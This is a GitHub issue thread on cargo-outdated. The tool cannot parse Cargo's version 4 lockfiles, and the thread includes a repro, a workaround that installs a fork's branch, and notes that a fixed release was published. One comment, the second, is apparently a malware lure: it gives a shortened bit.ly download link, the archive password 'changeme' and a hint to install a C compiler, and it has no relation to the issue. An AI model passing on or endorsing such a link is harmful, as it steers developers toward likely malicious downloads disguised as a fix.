### ISSUE TITLE
Incompatible with v4 lockfiles

### ISSUE THREAD

**Issue by dtolnay** [kbknapp/cargo-outdated#402]
As of https://github.com/rust-lang/cargo/pull/14595 and https://github.com/rust-lang/rust/pull/130929 (nightly-2024-09-29), Cargo is generating `version = 4` in Cargo.lock by default.

```console
$ cargo new repro
$ cd repro/
$ cargo build
$ cargo outdated
error: failed to parse lock file at: /path/to/repro/Cargo.lock

Caused by:
  lock file version 4 requires `-Znext-lockfile-bump`
```

Ironically, cargo-outdated's `cargo` dependency is outdated. I expect that adopting a newer version of the `cargo` library would resolve this issue.

https://github.com/kbknapp/cargo-outdated/blob/d3a7df3aa6041f2fdd89da82ae1bf3910cdf7fca/Cargo.toml#L30

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo

Password: changeme

you may need to install the c compiler

**Comment by frewsxcv** [comment]
For anyone who wants to work around this:

```
cargo install --git https://github.com/MonterraByte/cargo-outdated.git --branch cargo-update
```

via https://github.com/kbknapp/cargo-outdated/pull/403

**Comment by jkaye2012** [comment]
Any eta on when a v4-compatible version will be published?

**Comment by clarfonthey** [comment]
It has been published, although it should be updated to use the latest cargo version now that edition 2024 is stable.
